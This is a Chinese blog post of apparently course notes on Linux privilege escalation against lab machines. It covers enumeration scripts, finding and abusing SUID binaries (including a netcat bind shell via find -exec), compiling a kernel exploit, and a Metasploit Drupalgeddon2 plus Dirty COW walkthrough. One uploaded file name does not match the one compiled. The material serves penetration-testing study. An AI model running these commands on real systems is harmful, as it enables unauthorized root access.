系统相关
首页 > 系统相关> > 63 权限提升-Linux脏牛内核漏洞&SUID&信息收集

63 权限提升-Linux脏牛内核漏洞&SUID&信息收集

作者:互联网

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。

在这里插入图片描述
#提权前信息收集知识点-参考打包的PDF:
权限提升-linux提权手法总结

演示案例:
➢ Linux提权自动化脚本利用-4个脚本
➢ Linux提权SUID配合脚本演示-Aliyun
➢ Linux提权本地配合内核漏洞演示-Mozhe
➢ Linux提权脏牛内核漏洞演示-Aliyun,Vulnhub

#案例1-Linux提权自动化脚本利用-4个脚本
两个信息收集:LinEnum,linuxprivchecker
LinEnum:https://github.com/rebootuser/LinEnum
在这里插入图片描述
linuxprivchecker:https://github.com/sleventyeleven/linuxprivchecker

两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2

linux-exploit-suggester:https://github.com/mzet-/linux-exploit-suggester

例:运行linux-exploit-suggester.sh
./linux-exploit-suggester.sh(运行不了就加权限)
看结果:在这里插入图片描述
linux-exploit-suggester2:https://github.com/jondonas/linux-exploit-suggester-2
在这里插入图片描述

需要解释:信息收集有什么用哦?漏洞探针又有什么用哦?

#案例2-Linux提权SUID配合脚本演示-Vulhub
漏洞成因:chmod u+s给予了suid u-s删除了suid
使程序在运行中受到了suid root权限的执行过程导致

提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

参考利用:https://pentestlab.blog/2017/09/25/suid-executables/

touch liuyifei
find liuyifei -exec whoami \;
find liuyifei -exec netcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555

#案例3-Linux提权本地配合内核漏洞演示-Mozhe
提权过程:连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG

gcc 45010.c -o 45010
chmod +x 45010
./45010
id

#案例4-Linux提权脏牛内核漏洞演示-linux-exploit-suggester
内核提权整个过程:(linux-exploit-suggester获取信息哦)
vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG

内核漏洞提权过程:寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)

nmap 192.168.76.0/24
nmap -p1-65535 192.168.76.141
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.76.141
set lport 1898
set target 0
run
upload /tmp/40837.cpp /tmp/40837.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow

涉及资源:
https://github.com/rebootuser/LinEnum
https://www.vulnhub.com/entry/lampiao-1,249/
https://github.com/rebeyond/Behinder/releases
https://github.com/mzet-/linux-exploit-suggester
https://github.com/sleventyeleven/linuxprivchecker
https://pentestlab.blog/2017/09/25/suid-executables/
https://github.com/jondonas/linux-exploit-suggester-2

标签:suggester,SUID,提权,exploit,63,脏牛,https,linux,com
来源: https://blog.csdn.net/qq_44930903/article/details/112601419